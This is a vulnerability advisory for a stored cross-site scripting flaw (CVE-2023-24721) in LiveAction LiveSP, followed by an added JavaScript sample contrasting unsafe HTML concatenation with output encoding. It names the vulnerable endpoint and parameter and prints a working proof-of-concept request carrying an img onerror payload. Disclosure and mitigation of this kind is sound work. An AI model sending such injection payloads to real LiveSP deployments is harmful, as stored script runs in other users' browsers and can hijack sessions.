CVE-2023-24721: CVE/CVE-2023-24721.md at main · marcovntr/CVE

A cross-site scripting (XSS) vulnerability in LiveAction LiveSP v21.1.2 allows attackers to execute arbitrary web scripts or HTML.


CVE-2023-24721 - Stored Cross-site Scripting (XSS)

Description

An issue was discovered in LiveSP through v.21.1.2. A malicious user leveraging this vulnerability could inject arbitrary JavaScript code. The malicious payload will then be triggered every time an authenticated user browses the page containing it.

POC

Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. The attacker-supplied code can perform a wide variety of actions, such as stealing victims’ session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes. Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application’s processing space (for example, email messages sent over SMTP that are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and are not hindered by web browsers’ XSS filters. Depending on the affected page, ordinary users may be exploited during normal use of the application. In some situations this can be used to create web application worms that spread exponentially and ultimately exploit all active users.

Affected Endpoint

  • URL: https://[ip:port]/va/service/bach/topology/element
  • HTTP Post Parameter: name

Technical Details

In this specific instance, using the API available under /va/service/bach/topology/element, it is possible to inject arbitrary JavaScript code within the name POST parameter, as shown in the following HTTP Request/Response pair.

HTTP Request:

POST /va/service/bach/topology/element HTTP/1.1
Host: [REDACTED]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: [REDACTED]
X-Customer: [REDACTED]
Content-Type: application/json
Content-Length: 175
Origin: [REDACTED]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"attributes":{"name":"\"><img src='x' onerror='alert(\"pwned\")'>","extraLabel":""},"type":"cluster","keyType":"cluster:applicationUser","children":{"neType:application":[]}}

HTTP Response:

HTTP/1.1 201 Created
Server: [REDACTED]
Date: Wed, 04 Jan 2023 13:45:39 GMT
Content-Type: application/json
Content-Length: 902
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: Accept,Accept-Language,APP-Platform,APP-Version,Content-Disposition,Content-Language,Content-Range,Content-Type,X-Customer,X-Debug,X-MT-Admin,X-UserScope,X-UserToken
Access-Control-Allow-Origin: *
Referrer-Policy: strict-origin

[…]

As we note from the HTTP Response above, the exploit was successfully saved. At this point, when the user visits the https://[hostname:port]/va/cluster web page, the exploit runs from the victim’s browser.
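The following is an added example, not code from the advisory or from LiveSP: it takes the stored element object with the advisory's payload in the name attribute and contrasts a rendering routine that concatenates the name into HTML (the pattern that turns a stored value into live markup on a page such as /va/cluster) with one that HTML-encodes at output time. The render functions and the object shape are assumptions modelled on the request body above.

```javascript
// Added example (not from the advisory or from LiveSP): how a stored cluster
// "name" saved through /va/service/bach/topology/element becomes executable
// markup when rendered unsafely, and the output-encoding fix.
// The render functions are hypothetical; the object mirrors the request body.

// Constructed sample: the stored element, with the advisory's payload as name.
const storedElement = {
  attributes: {
    name: '"><img src=\'x\' onerror=\'alert("pwned")\'>',
    extraLabel: '',
  },
  type: 'cluster',
  keyType: 'cluster:applicationUser',
};

// Vulnerable pattern: untrusted name concatenated straight into HTML that the
// page later assigns to innerHTML. The leading quote in the payload closes the
// title attribute, and the <img onerror> becomes a live element.
function renderClusterRowUnsafe(el) {
  return '<tr><td title="' + el.attributes.name + '">' +
         el.attributes.name + '</td></tr>';
}

// Encode the five characters that can change HTML or attribute context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened pattern: encode at output time in every context the value lands in
// (attribute value and element body), so the browser treats it as text. The
// API accepting JSON is not a defence; the stored string reaches the DOM.
function renderClusterRowSafe(el) {
  const name = escapeHtml(el.attributes.name);
  return '<tr><td title="' + name + '">' + name + '</td></tr>';
}
```

Running both renderers over the sample shows the unsafe output containing a real `<img ... onerror=` element while the safe output contains only `&lt;img`, which the browser displays as the literal cluster name.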

Reference

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24721
